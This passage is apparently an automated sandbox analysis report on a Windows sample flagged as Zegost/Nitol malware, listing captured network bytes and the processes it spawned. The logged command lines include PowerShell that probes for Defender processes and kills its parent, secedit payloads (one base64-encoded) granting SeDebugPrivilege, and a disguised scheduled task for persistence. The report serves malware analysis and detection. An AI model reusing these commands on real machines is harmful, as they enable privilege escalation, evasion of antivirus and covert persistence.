2024-12-29 15:07:24 UTC	1369	IN	Data Raw: 6f 2d a4 b0 e2 e3 d4 c9 85 d9 9e 3e 1e e0 fb be a4 31 67 31 30 c5 78 e0 db fd 95 74 e7 8e 78 e3 67 2f c3 82 0e e6 05 ba 23 a8 37 1a 29 ef b9 1d 77 55 c0 03 79 11 62 fc 05 f1 c9 7e 1d 61 93 cc 9b d3 de 45 4d 34 e1 99 88 31 df 4c 57 55 a7 3f 1c 27 59 33 a4 c0 e3 83 05 be 17 c0 64 c1 44 0d f8 a9 65 77 04 58 58 59 4f f9 2f b4 20 ac a7 f6 e7 20 3e 2a ee 6a a5 68 98 3d 87 58 55 f5 33 8e 13 3e 1b 6d 86 1d 5f 8e 64 c4 c6 1f af 24 55 99 3c ac 7e ad c8 a1 e1 15 6a 64 b1 b7 1b ca ae bc 7a 1e 62 bb 66 32 59 21 74 09 62 c1 a4 ac ae 8b 9e 54 da 71 5e 67 99 70 6e 01 af 98 1c dd 09 7f 21 bd 75 44 57 21 04 8f 84 14 1f 3e 73 0c 17 b1 32 64 3e 5d 77 fd b5 84 21 56 92 c4 5f 30 93 fd 30 2e 52 a7 35 76 74 57 18 67 94 63 b2 70 86 b7 3f d1 ca 40 27 e0 c9 88 6a 90 b4 a4 a8 5f 13 Data Ascii: o->1g10xtxg/#7)wUyb~aEM41LWU?'Y3dDewXXYO/ >*jh=XU3>m_d$U<~jdzbf2Y!tbTq^gpn!uDW!>s2d>]w!V_00.R5vtWgcp?@'j_
2024-12-29 15:07:24 UTC	1369	IN	Data Raw: ec da 27 1a 00 8b 75 02 a0 30 d7 b7 3b 3e 73 e0 6e ac 8e e4 1e a6 82 64 31 69 3f 66 4e 35 a1 39 0c e7 31 2c dd 8c cf 33 58 96 85 93 25 5b a0 0c 8b 0d 7c 74 cf bc cf 22 5b df 38 b9 c1 59 ac 24 d1 ce 55 28 cc 70 85 97 28 0b 70 5c e5 fa a2 33 e9 99 4c 28 c2 82 75 b1 cd 7f 04 38 a2 89 05 9d bc cf b8 78 ed 5b 4c 27 f1 88 5b a4 c1 c5 f6 a3 e4 80 48 3b 3e 69 70 24 69 8a c5 0e da ec 9d 38 36 61 75 73 e2 2f 8f fc 5f 4c d6 dc 2a a0 e4 25 46 c7 07 4b fb e7 05 68 25 82 f1 6c 31 7a 7c 4b f5 50 f2 c1 f5 fd 9f c4 39 c9 48 68 ed 08 9b 3d cc 6c cc dc f7 c3 17 5c ab 6a 80 84 38 76 eb f8 35 75 85 55 c9 7a 94 89 3a 63 24 3c ec 05 2d 19 f7 bf 40 6c c6 19 60 4b 10 7c 47 d8 8a a1 5d 47 c9 29 b5 36 44 ed 56 e5 04 9e 60 32 da d8 c4 a3 0f 7d 0d 2e 1e 0c fe 1f f9 51 0f a8 34 68 35 Data Ascii: 'u0;>snd1i?fN591,3X%[\|t"[8Y$U(p(p\3L(u8x[L'[H;>ip$i86aus/_L*%FKh%l1z\|KP9Hh=l\j8v5uUz:c$<-@l`K\|G]G)6DV`2}.Q4h5
2024-12-29 15:07:24 UTC	1369	IN	Data Raw: 8f 35 94 01 81 60 94 a5 2b 29 fd 2c e4 bc 24 57 55 ef 34 e3 a8 48 50 2b a7 bf 4d f0 9e 65 d9 22 9f 5c 42 ee f9 fc 11 14 d3 b1 5e 29 38 97 57 c7 5c 05 d7 82 a2 4b 00 4c 69 40 cc d5 e7 64 1f f2 5a 47 bb 6e 62 4e b8 2f 9f 25 a8 09 93 5a be 59 39 5c da 07 a4 74 5a eb 4d 94 ee d2 5e a4 5d c5 58 4e a1 30 58 cd 5b f1 94 63 fc 4a 67 01 23 aa c7 7b 8c f8 95 c5 a4 72 64 60 3b 61 df 5e e4 41 a5 43 f2 1c c3 1b ca e4 c3 03 ce 49 46 f6 6e a4 8b 17 b5 87 0a 6f ee 81 ff 00 f9 6a 8f b7 20 06 84 7c 17 da 99 44 63 c6 6d e9 49 5d 1b c2 6a be c3 87 1c fa 68 ec dc 8e 35 dd 2e 69 19 ff 72 91 ba dc 2b 33 ad bd 6d 83 0d 95 cc 0b d8 ac eb f1 1c ac 68 95 96 01 19 cb 7b d6 c2 2a d7 8c 94 52 7a 24 4b df f2 e3 c3 ec af 4f 65 02 a7 83 dd f4 ec 44 5d 0d 3e 50 c1 a3 b9 b7 3a ee cd 60 6e Data Ascii: 5`+),$WU4HP+Me"\B^)8W\KLi@dZGnbN/%ZY9\tZM^]XN0X[cJg#{rd`;a^ACIFnoj \|DcmI]jh5.ir+3mh{*Rz$KOeD]>P:`n
2024-12-29 15:07:24 UTC	1369	IN	Data Raw: 5b 07 f6 1d cb 39 d1 29 03 58 c5 9a b7 16 0a 2e 08 a1 10 a7 3d e7 b6 f5 06 50 5d 1a d9 ec 1e 50 6f 83 9f a4 c9 43 31 a9 ad 71 85 a2 8d f0 e9 00 1e 4e ab 3c 86 67 f3 d6 3b d1 92 5f b9 2a c9 de 24 94 a8 4a 96 e8 61 9c 3a a9 09 41 6f 03 c2 a8 f1 00 fd da 53 aa fc 51 d4 a7 f9 5b 98 47 d7 dd 5e ce c8 fc 01 90 ea 8e 93 b9 3d 2e 6a 8f 32 9a 8d 6a 50 e3 99 35 74 5e ad 90 3d 5f a3 29 fe a3 97 5d 84 59 43 9f a4 3f 49 6e 68 49 2a 4b 84 f3 e1 6b e9 5f d5 c6 51 02 dd 57 5f 5e 4b cb cc 7b 49 b4 0f eb a4 95 12 9e 8c e9 2e dc c1 3d a5 ae 8e d0 81 4d 88 66 8a e6 94 85 d1 ff c6 56 50 66 b7 ec 07 a0 9a 30 30 34 04 79 3f 87 87 f6 91 16 df 15 37 b1 8d 4d 2d ab 0a d0 78 a9 0d 63 53 79 35 08 51 77 7f 48 62 92 79 2c 09 d6 b9 a7 68 99 20 20 dc cf 7e 15 2b a5 44 2d eb cf 5f 1c 2d Data Ascii: [9)X.=P]PoC1qN<g;_$Ja:AoSQ[G^=.j2jP5t^=_)]YC?InhIKk_QW_^K{I.=MfVPf004y?7M-xcSy5QwHby,h ~+D-_-

Target ID:	0
Start time:	10:07:01
Start date:	29/12/2024
Path:	C:\Users\user\Desktop\KL-3.1.16.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\KL-3.1.16.exe"
Imagebase:	0x7ff6f9250000
File size:	21'267'097 bytes
MD5 hash:	A741FBD12088E596142D3717B48502CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:07:01
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5904754 "__IRAFN:C:\Users\user\Desktop\KL-3.1.16.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
Imagebase:	0x7ff7c02b0000
File size:	5'153'280 bytes
MD5 hash:	2A7D5F8D3FB4AB753B226FD88D31453B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	10:07:06
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:07:06
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:07:07
Start date:	29/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Imagebase:	0x7ff7a8450000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:07:09
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:07:09
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:07:10
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:07:10
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:07:11
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:07:11
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:07:13
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=6980').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:07:13
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:07:28
Start date:	29/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe"
Imagebase:	0x7ff620620000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:07:28
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:07:28
Start date:	29/12/2024
Path:	C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe"
Imagebase:	0x5c0000
File size:	2'886'752 bytes
MD5 hash:	4764020339A4883862B79B60461B00D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	10:07:29
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Imagebase:	0x480000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:07:29
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Imagebase:	0x480000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:07:29
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:07:29
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Imagebase:	0x480000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:07:29
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:07:29
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:07:29
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Imagebase:	0x480000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3892, Parent PID: 2632

General

Target ID:	26
Start time:	10:07:29
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:07:30
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\inst.ini
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:07:30
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:07:30
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Imagebase:	0x7ff6ae840000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:07:31
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Imagebase:	0xcf0000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:07:31
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Imagebase:	0xcf0000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:07:31
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Imagebase:	0xcf0000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:07:31
Start date:	29/12/2024
Path:	C:\ProgramData\Program\iusb3mon.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\program\iusb3mon.exe
Imagebase:	0xc00000
File size:	2'886'752 bytes
MD5 hash:	4764020339A4883862B79B60461B00D1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 00000021.00000002.4652621653.0000000006315000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000021.00000002.4652621653.0000000006315000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	10:07:32
Start date:	29/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:07:33
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:07:33
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:07:33
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	10:07:33
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	10:07:33
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	10:07:41
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
